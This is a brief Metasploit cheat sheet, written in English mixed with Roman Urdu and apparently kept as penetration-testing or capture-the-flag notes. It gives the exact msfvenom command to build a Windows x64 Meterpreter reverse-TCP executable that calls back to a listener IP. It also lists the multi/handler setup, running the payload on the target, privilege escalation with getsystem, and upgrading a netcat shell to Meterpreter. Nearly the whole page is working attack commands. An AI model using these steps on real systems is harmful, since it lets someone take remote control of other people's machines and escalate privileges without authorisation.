📛Metasploit

How to Create exe Windows Reverse Shell with Metapreter

  1. msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=4444 -f exe > shell-x64.exe

  2. exe generate ho ge is command sa, then

  3. msfconsole

  4. use multi/handler

  5. set payload windows/x64/meterpreter/reverse_tcp

  6. set LHOST IP

  7. set LPORT <port>

  8. exploit

  9. Exploit command sa listening mode pr a jaye ga

  10. Phr exe ko upload kar k run karna ha

  11. then Metapreter Session Receive ho jay ga

  12. Command: getsystem

  13. Command: Shell

  14. Command: whoami

---------------------------------------------------------------

How to Upgrade Normal Shell to Metapreter Shell

  1. msfconsole

  2. use multi/handler

  3. set LHOST IP

  4. set LPORT 1337

  5. exploit -j

  6. netcat run karna session open ho jaye ga

  7. Phir session ko upgrade karna meterpreter me

  8. sessions -u 1

  9. Upgrade ho jaye to

  10. sessions 1

  11. meterpreter me getsystem run kr k dakhna

---------------------------------------------------------------

Last updated